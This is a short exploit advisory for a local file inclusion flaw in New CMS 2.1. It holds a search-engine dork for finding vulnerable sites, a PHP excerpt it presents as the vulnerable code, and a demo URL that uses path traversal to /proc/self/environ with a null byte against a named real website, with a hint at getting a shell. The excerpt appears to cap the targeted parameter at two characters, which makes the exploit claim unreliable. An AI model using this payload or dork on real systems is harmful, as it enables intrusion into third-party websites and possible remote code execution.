New CMS 2.1 Local File Inclusion

`===============================================  
  
[+] TITLE : NEW CMS Local File Inclusion Vulnerability (/proc/self/environ)   
[+] VENDOR : http://new-cms.org/index.php?lng=it&mod=download&pg=indice  
[+] VERSION : 2.1 or Later  
[+] AUTHOR : R3vanBastard  
[+] TESTED ON : Windows  
[+] DORK : "New CMS" inurl:index.php?lng=  
[+] YM : revan_blezinsky[at]yahoo.com  
  
==================[+]VULN[+]===================  
if (get_magic_quotes_gpc()) {  
$process = array(&$_GET, &$_POST, &$_COOKIE, &$_REQUEST);  
while (list($key, $val) = each($process)) {  
foreach ($val as $k => $v) {  
unset($process[$key][$k]);  
if (is_array($v)) {  
$process[$key][stripslashes($k)] = $v;  
$process[] = &$process[$key][stripslashes($k)];  
} else {  
$process[$key][stripslashes($k)] = stripslashes($v);  
}  
}  
}  
unset($process);  
}  
  
define("PER", "");  
include(PER."cdat.php");  
include(PER."struttura/funzioni.str"); //inclusione file con le funzioni e costanti principali  
include(CGEN."config".DTB); // inclusione file di configurazione  
  
if(strlen(dirname($_SERVER["SCRIPT_NAME"]))>1) { $DirName = dirname($_SERVER["SCRIPT_NAME"])."/"; } else { $DirName = "/"; }  
$sito[2] = "http://".$_SERVER["SERVER_NAME"].$DirName;  
$CMSVersion = "New-CMS 2.1";  
  
if(isset($_GET['mod'])) $_GET['mod'] = Prot($_GET['mod']);  
if(isset($_GET['pg'])) $_GET['pg'] = Prot($_GET['pg']);  
if(isset($_GET['s'])) $_GET['s'] = Prot($_GET['s']);  
if(isset($_GET['lng'])) {   
if(strlen($_GET['lng'])>2) unset($_GET['lng']);  
}  
============================================================  
  
[DEMO] http://www.salvatorecotena.it/index.php?lng=../../../../../../../../../../../../../proc/self/environ%0000 [shell? ]  
  
===================================================================  
  
Thanks to: My PC | Jogjamakeup.com | Mainhack |VOP CREW| Jack | rdnc.or.id |   
BoBy a.k.a c0li(yg botnya di gangbang)  
  
===================================================================  
`